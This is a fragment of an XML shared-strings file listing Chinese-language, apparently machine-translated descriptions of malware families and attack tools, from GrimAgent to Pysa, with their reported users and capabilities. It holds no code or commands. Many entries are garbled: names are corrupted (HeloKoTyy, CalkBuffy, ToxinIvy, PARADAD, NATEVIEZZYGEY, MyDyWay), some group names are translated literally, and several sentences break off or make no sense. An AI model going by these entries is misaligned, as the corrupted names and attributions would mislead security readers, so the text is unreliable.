    <t>GrimAgent是一个后门，在Ryuk勒索软件部署之前至少从2020年开始使用；它可能被FIN6和Wizard Spider使用。</t>
  </si>
  <si>
    <t>gsecdump是一个公开可用的凭据转储程序，用于从Windows操作系统获取密码哈希和LSA机密。</t>
  </si>
  <si>
    <t>GuLoader是一种文件下载程序，至少自2019年12月以来一直被用于分发各种远程管理工具（RAT）恶意软件，包括NETWIRE、Agent Tesla、NanoCore、FormBook和Parallax RAT。</t>
  </si>
  <si>
    <t>Gustuff是移动恶意软件，旨在窃取用户的银行和虚拟货币凭证。</t>
  </si>
  <si>
    <t>H1N1是一种恶意软件变体，通过使用VBA宏来感染受害者的活动传播。虽然它最初只有加载器功能，但现在已经发展到包含信息窃取功能。</t>
  </si>
  <si>
    <t>HAMMERTOSS是APT29在2015年使用的后门。</t>
  </si>
  <si>
    <t>Hancitor是一个下载程序，被小马和其他窃取信息的恶意软件使用。</t>
  </si>
  <si>
    <t>HAPPYWORK是APT37在2016年11月针对韩国政府和金融受害者使用的下载程序。</t>
  </si>
  <si>
    <t>HARDRAIN是据报道朝鲜政府使用的特洛伊木马恶意软件变体。</t>
  </si>
  <si>
    <t>Havij是一个自动SQL注入工具，由伊朗ITSecTeam安全公司发布。Havij已被渗透测试人员和对手使用。</t>
  </si>
  <si>
    <t>HAWKBALL是一个后门，在针对中亚政府部门时被观察到。</t>
  </si>
  <si>
    <t>hcdLoader是APT18使用的远程访问工具（RAT）。</t>
  </si>
  <si>
    <t>HDoor是Naikon集团定制并使用的恶意软件。</t>
  </si>
  <si>
    <t>HeloKoTyy是一个用C++编写的勒索软件，它与DyStruthSoM和Fiffand共享相似的代码结构和功能。HELLOKITTY至少从2020年开始使用，目标包括一家波兰视频游戏开发商和一家巴西电力公司。</t>
  </si>
  <si>
    <t>Helminth是一个后门，它至少有两个变体——一个是用VBScript和PowerShell编写的，通过Excel电子表格中的宏传递，另一个是独立的Windows可执行文件。</t>
  </si>
  <si>
    <t>HenBox是一种Android恶意软件，它试图只在运行MIUI操作系统的小米设备上执行。HenBox主要被用于针对维吾尔族，一个少数突厥民族。</t>
  </si>
  <si>
    <t>Hi Zor是一种远程访问工具（RAT），具有与Sakula类似的特性。它被用于一场名为INOCNATION的运动中。</t>
  </si>
  <si>
    <t>HiddenWasp是一种基于Linux的特洛伊木马，用于远程控制目标系统。它以静态链接的ELF二进制文件的形式与stdlibc++结合。</t>
  </si>
  <si>
    <t>HIDEDRV是APT28使用的rootkit。它已与Downdelph一起部署，以执行和隐藏该恶意软件。</t>
  </si>
  <si>
    <t>Hikit是一种恶意软件，Axiom在最初的妥协后使用它进行后期持久化和过滤。</t>
  </si>
  <si>
    <t>Hildegard是一种恶意软件，针对配置错误的kubelets进行初始访问，并运行加密货币矿工操作。恶意软件首次在2021年1月被发现。TeamTNT活动小组被认为是Hildegard的幕后黑手。</t>
  </si>
  <si>
    <t>HOMEFRY是一个64位Windows密码转储程序/破解程序，以前曾与其他Leviathan后门一起使用。</t>
  </si>
  <si>
    <t>HOPLIGHT是一个后门特洛伊木马程序，据报道朝鲜政府使用了该程序。</t>
  </si>
  <si>
    <t>HotCroissant是一种远程访问特洛伊木马（RAT），美国政府实体将其归因于朝鲜政府的恶意网络活动，统称为隐藏眼镜蛇。HotCroissant与Rifdoor有许多代码相似之处。</t>
  </si>
  <si>
    <t>HTRAN是一种通过中间跳来代理连接的工具，帮助用户伪装他们的真实地理位置。当与受害者网络交互时，它可以被敌人用来隐藏他们的位置。</t>
  </si>
  <si>
    <t>HTTPBrowser是已被多个威胁组织使用的恶意软件。人们认为它起源于中国。</t>
  </si>
  <si>
    <t>httpclient是Putter Panda使用的恶意软件。这是一个提供有限功能范围的简单工具，表明它可能被用作第二阶段或补充/备份工具。</t>
  </si>
  <si>
    <t>HummingBad是一个安卓恶意软件家族，它产生欺诈性广告收入，并能够在较旧、易受攻击的安卓版本上获得根访问权限。</t>
  </si>
  <si>
    <t>HummingWhale是一个执行广告欺诈的Android恶意软件家族。</t>
  </si>
  <si>
    <t>Hydraq是一种数据盗窃特洛伊木马，最早由Elderwood在2009年的谷歌入侵中使用，称为“极光行动”，不过在最近的一些活动中，其他中国参与者也使用了这种木马的变种，可能包括APT17。</t>
  </si>
  <si>
    <t>HyperBro是Threat Group-3390使用的自定义内存后门。</t>
  </si>
  <si>
    <t>HyperStack是Turla至少从2018年开始使用的基于RPC的后门。HyperStack与Turla使用的其他后门（包括碳）有相似之处。</t>
  </si>
  <si>
    <t>IcedID是一个模块化的银行恶意软件，旨在窃取至少自2017年以来在野外观察到的金融信息。IcedID已被Emotet在多个活动中下载。</t>
  </si>
  <si>
    <t>ifconfig是一个基于Unix的实用程序，用于收集有关系统上TCP/IP设置的信息并与之交互。</t>
  </si>
  <si>
    <t>iKitten是一种macOS过滤剂。</t>
  </si>
  <si>
    <t>Impacket是用Python编写的模块的开源集合，用于以编程方式构建和操作网络协议。Impacket包含多个用于远程服务执行、Kerberos操作、Windows凭据转储、数据包嗅探和中继攻击的工具。</t>
  </si>
  <si>
    <t>Industroyer是一个复杂的恶意软件框架，旨在对工业控制系统（ICS）的工作过程造成影响，尤其是变电站中使用的组件。2016年12月，Industroyer被用于攻击乌克兰电网。这是第一个专门针对和影响电网运行的公开恶意软件。</t>
  </si>
  <si>
    <t>InnaputRAT是一种远程访问工具，可以从受害者的机器中过滤文件。自2016年以来，InnaputRAT一直在野外被发现。</t>
  </si>
  <si>
    <t>InvisiMole是一个模块化间谍软件程序，InvisiMole集团至少从2013年开始使用该程序。InvisiMole有两个后门模块RC2FM和RC2CL，用于执行攻击后活动。在乌克兰和俄罗斯的受害者身上发现了这种病毒。Gamaredon Group infrastructure已被用于下载和执行针对少数受害者的InvisiMole。</t>
  </si>
  <si>
    <t>Invoke PSImage接受PowerShell脚本，并将脚本字节嵌入PNG图像的像素中。它生成一个一行程序，用于从web上的。例如，将调用Mimikatz模块中的PowerShell代码嵌入到图像文件中。例如，通过从宏调用图像文件，宏将下载图片并执行PowerShell代码，在本例中，该代码将转储密码。</t>
  </si>
  <si>
    <t>ipconfig是一个Windows实用程序，可用于查找有关系统TCP/IP、DNS、DHCP和适配器配置的信息。</t>
  </si>
  <si>
    <t>IronNetInjector是一个Turla工具链，它利用了Python的开源IronPython实现中的脚本。NET injector，用于丢弃一个或多个有效载荷，包括ComRAT。</t>
  </si>
  <si>
    <t>ISMInjector是一个特洛伊木马程序，用于安装另一个油井后门ISMAgent。</t>
  </si>
  <si>
    <t>Ixeshe是一个恶意软件家族，至少从2009年起就被用来攻击东亚的目标。</t>
  </si>
  <si>
    <t>Janicab是一种OS X特洛伊木马，它依赖于有效的开发者ID和不经意的用户来安装。</t>
  </si>
  <si>
    <t>Javali是一种银行特洛伊木马，自2017年以来一直以葡萄牙语和西班牙语国家为目标，主要针对巴西和墨西哥金融机构的客户。</t>
  </si>
  <si>
    <t>JCry是用Go编写的勒索软件。它被确定为2019年#行动的一部分。</t>
  </si>
  <si>
    <t>JHUHUGIT是APT28使用的恶意软件。它基于Carberp源代码，充当侦察恶意软件。</t>
  </si>
  <si>
    <t>JPIN是白金使用的定制后门系列。有证据表明，JPIN和Dipsind代码库的开发人员在某种程度上是相关的。</t>
  </si>
  <si>
    <t>jRAT是一款基于Java的跨平台后门，最初于2012年上市。jRAT的变体已通过软件即服务平台分发，类似于在线订阅模式。</t>
  </si>
  <si>
    <t>JSS Loader是带有的远程访问特洛伊木马（RAT）。NET和C++变体，已经被FiN7至少使用了2020。</t>
  </si>
  <si>
    <t>Judy是通过Google Play商店中的多个应用程序分发的自动点击广告软件。</t>
  </si>
  <si>
    <t>KARAE是一个后门，通常被APT37用作第一阶段恶意软件。</t>
  </si>
  <si>
    <t>Kasidet是通过使用恶意VBA宏丢弃的后门。</t>
  </si>
  <si>
    <t>Kazuar是一种功能齐全的多平台后门特洛伊木马，使用Microsoft。NET框架。</t>
  </si>
  <si>
    <t>Kerrdown是一款定制下载程序，至少从2018年起，APT32就开始使用它从受害者网络上的服务器安装间谍软件。</t>
  </si>
  <si>
    <t>Kessel是OpenSSH的高级版本，它充当一个自定义后门，主要用于窃取凭据并充当机器人。自2018年8月开始解析C2域以来，凯塞尔一直处于活跃状态。</t>
  </si>
  <si>
    <t>KeyBoy是一种恶意软件，在2016年针对西藏议会议员的有针对性的运动中被使用。</t>
  </si>
  <si>
    <t>KEYMARBLE是一种特洛伊木马，据报道朝鲜政府使用过该木马。</t>
  </si>
  <si>
    <t>KeyRaider是一种从越狱的iOS设备上窃取苹果帐户凭据和其他数据的恶意软件。它还具有勒索软件功能。</t>
  </si>
  <si>
    <t>KGH_SPY是Kimsuky用于侦察、信息窃取和后门功能的模块化工具套件。KGH_SPY的名称来源于PDB路径和包含“KGH”的样本中的内部名称。</t>
  </si>
  <si>
    <t>KillDisk是一种磁盘擦除工具，旨在用随机数据覆盖文件，使操作系统不可旋转。在2015年针对乌克兰的网络攻击中，它首次被视为BlackEnergy恶意软件的一个组成部分。KillDisk已经演变成独立的恶意软件，被欧洲和拉丁美洲的各种威胁行为体用来攻击其他目标；2016年，一些KillDisk变体中也加入了勒索软件组件。</t>
  </si>
  <si>
    <t>Kinsing是基于Golang的恶意软件，运行加密货币矿工，并试图将自己传播到受害者环境中的其他主机。</t>
  </si>
  <si>
    <t>Kivars是一个模块化远程访问工具（RAT），源自Bifrost RAT，BlackTech在2010年的一次活动中使用了该工具。</t>
  </si>
  <si>
    <t>Koadic是一个Windows后期开发框架和渗透测试工具。Koadic可在GitHub上公开使用，该工具通过命令行执行。Koadic有多个选择，用于装载有效载荷和制作植入物。Koadic使用Windows脚本主机执行大部分操作。</t>
  </si>
  <si>
    <t>Kobalos是一个多平台后门，可用于Linux、FreeBSD和Solaris。Kobalos已针对高知名度目标部署，包括高性能计算机、学术服务器、端点安全供应商和大型互联网服务提供商；在欧洲、北美和亚洲都有发现。科巴罗斯于2019年末首次被发现。</t>
  </si>
  <si>
    <t>Komplex是APT28在OS X上使用的后门，似乎是以类似于XAgentOSX的方式开发的。</t>
  </si>
  <si>
    <t>KOMPROGO是APT32使用的一个签名后门，能够进行流程、文件和注册表管理。</t>
  </si>
  <si>
    <t>KONNI也是一款Windows远程管理系统，自2014年开始投入使用，其功能至少在2017年得到了发展。KONNI与涉及朝鲜主题的几场运动有关。KONNI与NOKKI恶意软件家族有大量代码重叠。有一些证据表明KONNI可能与APT37有关。</t>
  </si>
  <si>
    <t>Kwampirs是Orangeworm使用的后门特洛伊木马。在安装了用于使用和控制X射线和MRI等高科技成像设备的软件的机器上也发现了这种情况。</t>
  </si>
  <si>
    <t>LaZagne是一种攻击后的开源工具，用于恢复系统上存储的密码。它有针对Windows、Linux和OSX的模块，但主要集中在Windows系统上。LaZagne可在GitHub上公开获取。</t>
  </si>
  <si>
    <t>LightNeuron是一个复杂的后门，至少从2014年起就以Microsoft Exchange服务器为目标。LightNeuron被Turla用来攻击外交和外交相关组织。恶意软件中某些字符串的存在表明存在LightNeuron的Linux变体。</t>
  </si>
  <si>
    <t>Linfo是一种rootkit特洛伊木马，Elderwood使用它在受损主机上打开后门。</t>
  </si>
  <si>
    <t>Linux Rabbit是一种恶意软件，在2018年8月至10月的一场活动中针对Linux服务器和物联网设备。它与另一种叫做Rabbot的恶意软件共享代码。该活动的目标是在目标服务器和设备上安装加密货币矿工。</t>
  </si>
  <si>
    <t>LiteDuke是APT29主要在2014-2015年使用的第三阶段后门。LiteDuke使用与PolyglotDuke相同的滴管，并在MiniDuke也入侵的机器上发现。</t>
  </si>
  <si>
    <t>LockerGoga是一种勒索软件，与针对欧洲公司的各种攻击有关。2019年1月首次报道。</t>
  </si>
  <si>
    <t>LoJax是一个UEFI rootkit，APT28使用它在目标系统上持久化远程访问软件。</t>
  </si>
  <si>
    <t>Lokibot是2015年首次报道的一种分布广泛的信息窃取者。它旨在窃取敏感信息，如用户名、密码、加密货币钱包和其他凭证。Lokibot还可以创建一个进入受感染系统的后门，让攻击者安装额外的有效负载。</t>
  </si>
  <si>
    <t>CalkBuffy是一个用C++编写的远程访问木马，它在2019年7月被用于至少三家美国公用事业公司。用回溯法观察了塔龙石活动群。</t>
  </si>
  <si>
    <t>LoudMiner是一家加密货币采矿公司，它使用虚拟化软件抽取系统资源。这家矿商已与Windows和macOS虚拟工作室技术（VST）的盗版拷贝捆绑在一起。</t>
  </si>
  <si>
    <t>LOWBALL是由admin@338.2015年8月，它被用于针对香港媒体组织的电子邮件中。</t>
  </si>
  <si>
    <t>Lslsass是一个公开可用的工具，可以从lsass进程中转储活动登录会话密码哈希。</t>
  </si>
  <si>
    <t>Lucifer是一个加密矿工和DDoS混合的恶意软件，利用众所周知的漏洞在Windows平台上横向传播。</t>
  </si>
  <si>
    <t>Lurid是一个恶意软件家族，早在2006年就被包括PittyTiger在内的多个组织用于目标攻击。</t>
  </si>
  <si>
    <t>MacSpy是darkweb上提供的恶意软件即服务。</t>
  </si>
  <si>
    <t>MailSniper是一种渗透测试工具，用于在Microsoft Exchange环境中通过电子邮件搜索特定条款（密码、内部情报、网络体系结构信息等）。非管理用户可以使用它搜索自己的电子邮件，Exchange管理员也可以使用它搜索域中每个用户的邮箱。</t>
  </si>
  <si>
    <t>Mandrake是一个成熟的安卓间谍平台，至少自2016年以来一直活跃在野外。Mandrake的维护非常积极，具有复杂的功能和攻击，能够以外科手术的精度执行。</t>
  </si>
  <si>
    <t>Marcher是用于金融欺诈的Android恶意软件。</t>
  </si>
  <si>
    <t>MarkiRAT是一种使用Visual Studio编译的远程访问特洛伊木马（RAT），至少从2015年开始被凶猛的小猫使用。</t>
  </si>
  <si>
    <t>Matryoshka是CopyKittens使用的恶意软件框架，由滴管、装载器和RAT组成。它有多个版本；从2016年7月到2017年1月，v1在野外被发现。v2的命令更少，还有其他一些细微的区别。</t>
  </si>
  <si>
    <t>Mazabot是2016年在丹麦通过短信发布的安卓恶意软件。</t>
  </si>
  <si>
    <t>MCMD是一个远程访问工具，提供Dragonfly 2.0使用的远程命令外壳功能。</t>
  </si>
  <si>
    <t>MechaFounder是APT39使用的基于python的远程访问工具（RAT）。有效负载使用参与者开发的代码和开发社区在线免费提供的代码片段的组合。</t>
  </si>
  <si>
    <t>meek是一个开源Tor插件，通过HTTPS连接传输Tor流量。</t>
  </si>
  <si>
    <t>MegaCortex是最早出现在2019年5月的勒索软件。MegaCortex主要针对工业组织。</t>
  </si>
  <si>
    <t>Melcoz是一个银行特洛伊木马家族，由开源工具Remote Access PC构建而成。Melcoz最早在巴西的攻击中被发现，自2018年以来已蔓延至智利、墨西哥、西班牙和葡萄牙。</t>
  </si>
  <si>
    <t>MESSAGETAP是一个数据挖掘恶意软件家族，由APT41部署到电信网络中，用于监控和保存来自特定电话号码、IMSI号码或包含特定关键字的短信流量。</t>
  </si>
  <si>
    <t>Metamorfo是一个拉丁美洲银行特洛伊木马程序，由一个巴西网络犯罪集团运营，自2018年4月以来一直活跃。该集团专注于巴西和墨西哥的银行和加密货币服务。</t>
  </si>
  <si>
    <t>Micropsia是一个用Delphi编写的远程访问工具。</t>
  </si>
  <si>
    <t>Mimikatz是一个凭证转储程序，能够获取明文Windows帐户登录名和密码，以及许多其他功能，这些功能使其对测试网络安全性非常有用。</t>
  </si>
  <si>
    <t>MimiPenguin是一个凭证转储程序，类似于Mimikatz，专门为Linux平台设计。</t>
  </si>
  <si>
    <t>Miner-C是为Monero加密货币挖掘受害者的恶意软件。它的目标是FTP服务器和网络连接存储（NAS）设备的传播。</t>
  </si>
  <si>
    <t>MiniDuke是APT29在2010年至2015年间使用的恶意软件。MiniDuke工具集由多个下载器和后门组件组成。该装载机已与其他MiniDuke组件以及CosmicDuke和PinchDuke一起使用。</t>
  </si>
  <si>
    <t>MirageFox是一种针对Windows系统的远程访问工具。它似乎是一种被称为“幻影”的工具的升级版，据信这是一种起源于2012年的老鼠。</t>
  </si>
  <si>
    <t>Mis Type是2012年沙尘暴使用的后门混合动力车。</t>
  </si>
  <si>
    <t>Misdat是2010年至2011年沙尘暴使用的后门。</t>
  </si>
  <si>
    <t>Mivast是Deep Panda使用的后门。据报道，它被用于违反国歌。</t>
  </si>
  <si>
    <t>MobileOrder是一种特洛伊木马，旨在危害Android移动设备。它已被猩红色模仿使用。</t>
  </si>
  <si>
    <t>MoleNet是一款具有后门功能的下载工具，至少从2019年开始使用。</t>
  </si>
  <si>
    <t>Monokle是一款有针对性、先进的移动监控软件。它是为Android开发的，但有一些代码工件表明可能正在开发iOS版本。</t>
  </si>
  <si>
    <t>MoonWind是一种远程访问工具（RAT），2016年被用于泰国的目标组织。</t>
  </si>
  <si>
    <t>More_eggs是Cobalt Group和FIN6使用的JScript后门。它的名字是基于代码中的变量“More_eggs”而命名的。后门至少有两个不同的版本，版本2.0和版本4.4。</t>
  </si>
  <si>
    <t>MURKYTOP是利维坦使用的一种侦察工具。</t>
  </si>
  <si>
    <t>Naid是一种特洛伊木马，Elderwood使用它在受损主机上打开后门。</t>
  </si>
  <si>
    <t>NanoCore是一款模块化远程访问工具，于年开发。可以用来监视受害者和窃取信息的网络。自2013年以来，它一直被威胁行为体使用。</t>
  </si>
  <si>
    <t>NATEVIEZZYGEY是Alpt29的一次性定制钴冲击装载机的总称，因为至少2021。</t>
  </si>
  <si>
    <t>NavRAT是一个远程访问工具，用于上传、下载和执行文件。在针对韩国的袭击中观察到了这种情况。</t>
  </si>
  <si>
    <t>NBTscan是一种开源工具，国家组织使用它在受损网络内进行内部侦察。</t>
  </si>
  <si>
    <t>nbtstat是一个用于解决NetBIOS名称解析问题的实用程序。</t>
  </si>
  <si>
    <t>NDiskMonitor是一个用。NET，这似乎是拼凑工作所独有的。</t>
  </si>
  <si>
    <t>Nerex是一种特洛伊木马，Elderwood使用它在受损主机上打开后门。</t>
  </si>
  <si>
    <t>Net实用程序是Windows操作系统的一个组件。它在命令行操作中用于控制用户、组、服务和网络连接。</t>
  </si>
  <si>
    <t>Net Crawler是一种intranet蠕虫，能够使用凭据转储程序提取凭据，并通过使用恢复的密码强制帐户，并使用PsExec执行Net Crawler的副本，通过SMB传播到网络上的系统。</t>
  </si>
  <si>
    <t>NETEAGLE是由APT30开发的后门，编译日期早在2008年。它有两个主要变体，分别是“Scout”和“Norton”</t>
  </si>
  <si>
    <t>netsh是一个脚本实用程序，用于与本地或远程系统上的网络组件进行交互。</t>
  </si>
  <si>
    <t>netstat是一个操作系统实用程序，它显示活动的TCP连接、侦听端口和网络统计信息。</t>
  </si>
  <si>
    <t>NetTraveler是一种恶意软件，已被用于多个网络间谍活动中，用于对受害者进行基本监视。已知的最早样本的时间戳可以追溯到2005年，观察到的样本数量最多的是在2010年至2013年之间。</t>
  </si>
  <si>
    <t>Netwalker是在PowerShell中编写并直接在内存中执行的无文件勒索软件。</t>
  </si>
  <si>
    <t>NETWIRE是一种公开的多平台远程管理工具（RAT），至少从2012年起就被犯罪和APT组织使用。</t>
  </si>
  <si>
    <t>Ngrok是一个合法的反向代理工具，可以创建一个安全隧道，连接到防火墙后面或没有公共IP的本地机器上的服务器。Ngrok在几次战役中都受到了威胁行动方的利用，包括用于横向移动和数据过滤。</t>
  </si>
  <si>
    <t>Nidiran是Suckfly开发和使用的定制后门。它是通过战略性网络妥协实现的。</t>
  </si>
  <si>
    <t>njRAT是2012年首次观察到的远程访问工具（RAT）。它已经被中东的威胁者所使用。</t>
  </si>
  <si>
    <t>Nltest是一个Windows命令行实用程序，用于列出域控制器和枚举域信任。</t>
  </si>
  <si>
    <t>NOKKI是一款模块化远程访问工具。最早观察到的使用NOKKI的攻击发生在2018年1月。NOKKI与KONNI恶意软件家族有大量代码重叠。有一些证据表明NOKKI可能与APT37有关。</t>
  </si>
  <si>
    <t>NotCompatible是一个安卓恶意软件家族，至少在2014年至2016年间使用过。它有多个变种，随着时间的推移变得更加复杂。</t>
  </si>
  <si>
    <t>NotPetya是Sandworm团队在2017年6月27日开始的全球攻击中使用的恶意软件。虽然NotPetya看起来是一种勒索软件，但它的主要目的是破坏受损系统上的数据和磁盘结构；攻击者从未打算恢复加密数据。因此，NotPetya可能更适合被视为一种雨刮器恶意软件。NotPetya包含类似蠕虫的功能，可以使用SMBv1利用EternalBlue和EternalRomance在计算机网络中传播。</t>
  </si>
  <si>
    <t>OBAD是一个安卓恶意软件家族。</t>
  </si>
  <si>
    <t>ObliqueRAT是一种远程访问特洛伊木马，类似于Crimson，透明部落至少从2020年开始使用它。</t>
  </si>
  <si>
    <t>OceanSalt是一种特洛伊木马，曾用于针对韩国、美国和加拿大受害者的活动。OceanSalt与SpyNote RAT的代码相似，后者与APT1有关。</t>
  </si>
  <si>
    <t>Octopus是一种用Delphi编程语言编写的Windows特洛伊木马，至少自2014年以来，游牧章鱼就一直使用它来攻击中亚的政府组织。</t>
  </si>
  <si>
    <t>Okrum是一款Windows后门，自2016年12月以来一直在使用，与Ke3chang有着密切的联系。</t>
  </si>
  <si>
    <t>OLDBAIT是APT28使用的凭证收割机。</t>
  </si>
  <si>
    <t>OldBoot是Android恶意软件家族。</t>
  </si>
  <si>
    <t>Olympic Destroyer是沙虫队在2018年韩国平昌冬奥会上使用的恶意软件。恶意软件的主要目的是使受感染的计算机系统无法运行。该恶意软件利用各种本机Windows实用程序和API调用来执行其破坏性任务。奥林匹克驱逐舰具有蠕虫般的特征，可以通过计算机网络传播，以最大限度地发挥其破坏性影响。</t>
  </si>
  <si>
    <t>OnionDuke是2013年至2015年间被APT29使用的恶意软件。</t>
  </si>
  <si>
    <t>OopsIE是OilRig使用的特洛伊木马，用于远程执行命令以及向受害者上传/下载文件。</t>
  </si>
  <si>
    <t>Orz是Leviathan使用的自定义JavaScript后门。据观察，2014年以及2017年8月，微软Publisher File删除了该软件。</t>
  </si>
  <si>
    <t>OSInfo是APT3用来在受害者的计算机和网络上进行内部发现的自定义工具。</t>
  </si>
  <si>
    <t>OSX/Shlayer是一种专为在macOS上安装广告软件而设计的特洛伊木马，首次发现于2018年。</t>
  </si>
  <si>
    <t>OSX_OCEANLOTUS。D是一个MacOS后门，有几个版本已经被APT32使用。</t>
  </si>
  <si>
    <t>OUT1是一个用Python编写的远程访问工具，它被MyDyWay至少使用了2021。</t>
  </si>
  <si>
    <t>OwaAuth是部署在Microsoft Exchange服务器上的一个Web外壳和凭据窃取程序，该服务器似乎仅由威胁集团3390使用。</t>
  </si>
  <si>
    <t>P.A.S.Webshell是一个公开的多功能PHP Webshell，至少从2016年开始使用，可在目标web服务器上提供远程访问和执行。</t>
  </si>
  <si>
    <t>P8RAT是一种无文件恶意软件，menuPass至少从2020年开始使用它下载和执行有效载荷。</t>
  </si>
  <si>
    <t>Pallas是由Dark Caracal定制开发的移动监控软件。</t>
  </si>
  <si>
    <t>Pasam是一种特洛伊木马，Elderwood使用它在受损主机上打开后门。</t>
  </si>
  <si>
    <t>Pass The Hash Toolkit是一个允许对手“传递”密码哈希（而不知道原始密码）以登录系统的工具包。</t>
  </si>
  <si>
    <t>Pay2KEY是一个用C++编写的勒索软件，它已经被福克斯小猫使用过，至少在2020年7月，包括反对以色列公司的活动。Pay2Key已与泄密网站合并，以显示被盗的敏感信息，进一步迫使受害者付款。</t>
  </si>
  <si>
    <t>Pegasus for Android是安卓版本的恶意软件，据报道与NSO集团有关。iOS版本在Pegasus for iOS下单独跟踪。</t>
  </si>
  <si>
    <t>Pegasus for iOS是iOS版本的恶意软件，据报道与NSO集团有关。它已经被广告和出售，以高价值的受害者为目标。Android版本在Pegasus for Android下单独跟踪。</t>
  </si>
  <si>
    <t>Penquin是一种远程访问特洛伊木马（RAT），Turla至少从2014年开始使用多个版本来攻击Linux系统。</t>
  </si>
  <si>
    <t>Peppy是一种基于Python的远程访问特洛伊木马，自2012年以来一直处于活动状态，与Crimson类似。</t>
  </si>
  <si>
    <t>PHOREAL是APT32使用的标志性后门。</t>
  </si>
  <si>
    <t>Pillowmint是FIN7用来捕获信用卡信息的销售点恶意软件。</t>
  </si>
  <si>
    <t>PinchDuke是APT29在2008年至2010年间使用的恶意软件。</t>
  </si>
  <si>
    <t>Ping是一种操作系统实用程序，通常用于对网络连接进行故障诊断和验证。</t>
  </si>
  <si>
    <t>PipeMon是Winnti Group使用的多级模块化后门。</t>
  </si>
  <si>
    <t>Pisloader是一个恶意软件家族，由于其使用DNS作为C2协议，以及使用反分析策略而引人注目。它已被APT18使用，与该组织使用的另一个恶意软件家族HTTPBrowser类似。</t>
  </si>
  <si>
    <t>PJApps是一个Android恶意软件家族。</t>
  </si>
  <si>
    <t>PLAINTEE是一个恶意软件样本，在新加坡和柬埔寨的目标攻击中被Rancor使用。</t>
  </si>
  <si>
    <t>PARADAD是一种远程访问工具（RAT）和下载器，由BLASTECTR在东亚、台湾、日本和香港等地进行有针对性的攻击。Con辩也被称为TSCookie，不过最近的报道表明这两人可能会分离。</t>
  </si>
  <si>
    <t>PlugX是一个使用模块化插件的远程访问工具（RAT）。它已被多个威胁组织使用。</t>
  </si>
  <si>
    <t>pngdowner是Putter Panda使用的恶意软件。它是一个简单的工具，功能有限，没有持久性机制，这表明它仅用作一个简单的“下载并执行”实用程序。</t>
  </si>
  <si>
    <t>PoetRAT是一种远程访问特洛伊木马（RAT），于2020年4月首次被识别。PoetRAT已被用于针对阿塞拜疆私营和公共部门的多项运动，包括能源部门的ICS和SCADA系统。使用恶意软件观察到辉锑矿活动组。PoetRAT的名字来源于法典中对诗人威廉·莎士比亚的引用。</t>
  </si>
  <si>
    <t>ToxinIvy是一种流行的远程访问工具（RAT），已被许多团体使用。</t>
  </si>
  <si>
    <t>PolyglotDuke是一种下载程序，至少从2013年起就被APT29使用。PolyglotDuke曾被用来丢弃MiniDuke。</t>
  </si>
  <si>
    <t>Pony是一种盗取凭证的恶意软件，尽管它的下载功能也被对手使用。Pony Loader 1.0和2.0的源代码在网上泄露，导致各种威胁行为体使用它们。</t>
  </si>
  <si>
    <t>POORAIM是APT37在至少2014年以来的活动中使用的后门。</t>
  </si>
  <si>
    <t>PoshC2是一个开源远程管理和攻击后框架，可在GitHub上公开使用。该工具的服务器端组件主要是用Python编写的，而移植是用PowerShell编写的。尽管PoshC2主要关注Windows植入，但它确实包含一个用于Linux/macOS的基本Python滴管。</t>
  </si>
  <si>
    <t>PoshPy是一个后门，至少从2015年起就被APT29使用。它似乎被用作第二个后门，如果演员无法进入他们的主后门。</t>
  </si>
  <si>
    <t>Power Loader是在网络犯罪市场上销售的模块化代码，在Carberp、Redyms和Gapz等恶意软件家族中用作下载程序。</t>
  </si>
  <si>
    <t>PowerDuke是APT29在2016年使用的后门。它主要通过包含恶意宏的Microsoft Word或Excel附件传递。</t>
  </si>
  <si>
    <t>PowerShower是一个PowerShell后门，由Inception用于初始侦察、下载和执行第二阶段有效载荷。</t>
  </si>
  <si>
    <t>POWERSOURCE是一个PowerShell后门，它是一个经过严重混淆和修改的公开可用工具DNS_TXT_Pwnage版本。2017年2月，在针对参与美国证券交易委员会（SEC）在多个组织提交的文件的人员的网络钓鱼活动中观察到了这种情况。该恶意软件是在受害者启用宏并删除VBS脚本时交付的。</t>
  </si>
  <si>
    <t>PowerSploit是一个开源的攻击性安全框架，由PowerShell模块和脚本组成，执行与渗透测试相关的广泛任务，如代码执行、持久性、绕过反病毒、侦察和过滤。</t>
  </si>
  <si>
    <t>PowerStallion是Turla使用的轻量级PowerShell后门，可能是安装其他后门的恢复访问工具。</t>
  </si>
  <si>
    <t>POWERSTATS是MuddyWater使用的基于PowerShell的第一阶段后门。</t>
  </si>
  <si>
    <t>POWERTON是2018年首次观测到的定制PowerShell后门。APT33通常将其部署为后期后门。后门至少有两种变体已经被确认，较新的版本包含改进的功能。</t>
  </si>
  <si>
    <t>POWRUNER是一个PowerShell脚本，用于向C2服务器发送和接收命令。</t>
  </si>
  <si>
    <t>Prikormka是一个被称为“地面诱饵行动”的活动中使用的恶意软件家族。它主要在乌克兰被观察到，早在2008年就被使用。</t>
  </si>
  <si>
    <t>ProLock是一种勒索软件，至少自2020年以来一直用于大型狩猎（BGH）行动，通常通过QakBot获得初始访问权限。ProLock是PwnLocker勒索软件的继任者，该勒索软件在2019年被发现包含一个允许在不支付赎金的情况下解密的漏洞。</t>
  </si>
  <si>
    <t>Proton是macOS的后门，专注于数据窃取和凭证访问。</t>
  </si>
  <si>
    <t>Proxysvc是Lazarus Group在名为“幽灵秘密行动”的活动中使用的恶意DLL。自2017年以来，它似乎一直在未被发现的情况下运行，并且主要在高等教育机构中观察到。Proxysvc的目标是向目标交付额外的有效载荷，并维持对攻击者的控制。它是DLL的形式，也可以作为独立进程执行。</t>
  </si>
  <si>
    <t>PS1是在Costarito战役中用于部署64位后门的加载程序。</t>
  </si>
  <si>
    <t>PsExec是一个免费的微软工具，可以用来在另一台计算机上执行程序。它被It管理员和攻击者使用。</t>
  </si>
  <si>
    <t>Psylo是一种基于外壳代码的特洛伊木马，已被Scarlet Mimic使用。它与赝品有相似的特征。</t>
  </si>
  <si>
    <t>PUNCHBUGGY是FIN8使用的一种后门恶意软件，据观察，其目标是酒店业的POS网络。</t>
  </si>
  <si>
    <t>PUNCHTRACK是FIN8用来刮取支付卡数据的非持久性销售点（POS）系统恶意软件。</t>
  </si>
  <si>
    <t>Pupy是一款开源、跨平台（Windows、Linux、OSX、Android）的远程管理和后期开发工具。它是用Python编写的，可以通过几种不同的方式（Windows exe、Python文件、PowerShell oneliner/file、Linux elf、APK、Rubber Ducky等）生成有效负载。Pupy可在GitHub上公开获取。</t>
  </si>
  <si>
    <t>pwdump是一个凭证转储程序。</t>
  </si>
  <si>
    <t>Pysa是一款勒索软件，于2018年10月首次使用，被视为针对特别高价值的金融、政府和医疗机构。</t>
  </si>
  <si>
